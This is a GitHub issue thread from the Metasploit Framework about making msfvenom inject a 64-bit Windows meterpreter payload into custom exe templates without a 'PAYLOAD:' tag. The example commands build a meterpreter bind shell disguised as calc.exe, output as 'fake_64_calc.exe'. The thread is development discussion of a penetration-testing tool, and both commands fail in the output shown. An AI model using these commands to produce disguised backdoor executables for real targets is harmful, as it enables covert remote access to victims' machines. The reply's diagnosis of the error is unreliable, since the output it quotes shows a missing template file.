### ISSUE TITLE
Improve x64 exe payload generation without using find_payload_tag

### ISSUE THREAD

**Issue by wchen-r7** [rapid7/metasploit-framework#4381]
As an user, if I want to use a custom 64-bit windows template (such as calc), I shouldn't have to manually modify the template and shove a tag "PAYLOAD:" in it. It makes the template feature almost unusable:

```
$ ./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe > /tmp/fake_64_calc.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
Found 0 compatible encoders
Invalid PE EXE subst template: missing "PAYLOAD:" tag
```

One way to work around that is instead of using exe format, do exe-only. But if exe-only can do it, why can't exe? The find_payload_tag way feels like a dirty trick.

**Comment by Tikam02** [comment]
root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe > /tmp/fake_64_calc.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 484 bytes
Error: No such file or directory @ rb_file_s_size - /tmp/templates/64_calc.exe


i think there is issue in your command like you've not selected Any Encoder 
not selected or included any platform and also not selected any Arch.

Try to include Three of them.
